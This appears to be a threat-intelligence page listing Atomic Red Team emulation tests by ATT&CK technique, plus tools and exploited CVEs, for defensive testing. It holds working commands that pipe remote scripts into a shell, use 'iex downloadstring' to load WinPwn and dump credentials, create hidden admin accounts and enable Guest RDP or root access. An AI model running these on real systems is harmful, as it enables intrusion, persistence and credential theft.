#{curl_path} -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "*<|>*" -m3 #{domain} >nul 2>&1

shlinux, macosMalicious User Agents - Nix

curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
curl -s -A "*<|>*" -m3 #{domain}

T1074.001 Local Data Staging · 3 tests

powershellwindowsStage data from Discovery.bat

Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file}

shlinux, macosStage data from Discovery.sh

curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > #{output_file}

powershellwindowsZip a Folder with PowerShell for Staging in Temp

Compress-Archive -Path "#{input_file}" -DestinationPath #{output_file} -Force

T1078.001 Default Accounts · 3 tests

command_promptelevatedwindowsEnable Guest account with RDP capability and admin privileges

net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f

command_promptelevatedwindowsActivate Guest Account

net user #{guest_user} /active:yes

shelevatedmacosEnable Guest Account on macOS

sudo sysadminctl -guestAccount on

T1078.003 Local Accounts · 13 tests

command_promptelevatedwindowsCreate local account with admin privileges

net user art-test /add
net user art-test #{password}
net localgroup administrators art-test /add

bashelevatedmacosCreate local account with admin privileges - MacOS

dscl . -create /Users/AtomicUser
dscl . -create /Users/AtomicUser UserShell /bin/bash
dscl . -create /Users/AtomicUser RealName "Atomic User"
dscl . -create /Users/AtomicUser UniqueID 503
dscl . -create /Users/AtomicUser PrimaryGroupID 503
dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser
dscl . -passwd /Users/AtomicUser mySecretPassword
dscl . -append /Groups/admin GroupMembership AtomicUser

bashelevatedmacosCreate local account with admin privileges using sysadminctl utility - MacOS

sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin

bashelevatedmacosEnable root account using dsenableroot utility - MacOS

dsenableroot #current user
dsenableroot -u art-tester -p art-tester -r art-root #new user

bashelevatedmacosAdd a new/existing user to the admin group using dseditgroup utility - macOS

dseditgroup -o edit -a art-user -t user admin

powershellelevatedwindowsWinPwn - Loot local Credentials - powerhell kittie

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive

powershellelevatedwindowsWinPwn - Loot local Credentials - Safetykatz

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive

bashelevatedlinuxCreate local account (Linux)

password=$(openssl passwd -1 art)
([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
su art -c "whoami; exit"

bashelevatedlinuxReactivate a locked/expired account (Linux)

useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
usermod --lock art
usermod --expiredate "1" art
usermod --unlock art
usermod --expiredate "99999" art
su -c whoami art

shelevatedlinuxReactivate a locked/expired account (FreeBSD)

pw useradd art -g wheel -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
pw lock art
pw usermod art -e +1d
pw unlock art
pw user mod art -e +99d
su art
whoami
exit

bashelevatedlinuxLogin as nobody (Linux)

cat /etc/passwd |grep nobody
chsh --shell /bin/bash nobody
usermod --password $(openssl passwd -1 nobody) nobody
su -c "whoami" nobody

shelevatedlinuxLogin as nobody (freebsd)

cat /etc/passwd |grep nobody
pw usermod nobody -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user nobody -h 0
su nobody
whoami
exit

command_promptelevatedwindowsUse PsExec to elevate to NT Authority\SYSTEM account

"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula -s %COMSPEC% /c whoami

▶

Tools Used

2 mapped

S0002 · Mimikatz S0111 · schtasks

Other tooling / TTPs (curation, not ATT&CK-mapped):

MEGAZORD RUST VARIANTMEGA NZMETERPRETERMFA-LESS VPN ACCOUNT TARGETINGMFA LESS VPN ACCOUNT TARGETINGMSHTASHARPHOUNDSONICWALL VPN CREDENTIAL TARGETINGSPLASHTOP ABUSE

◈

CVEs Exploited

CVECVE-2020-3259
CVECVE-2023-20269
CVECVE-2023-22518
CVECVE-2023-27532
CVECVE-2024-37085
CVECVE-2024-40711

External lookups - second-class, for what we don’t hold ourselves

MITRE search Malpedia Google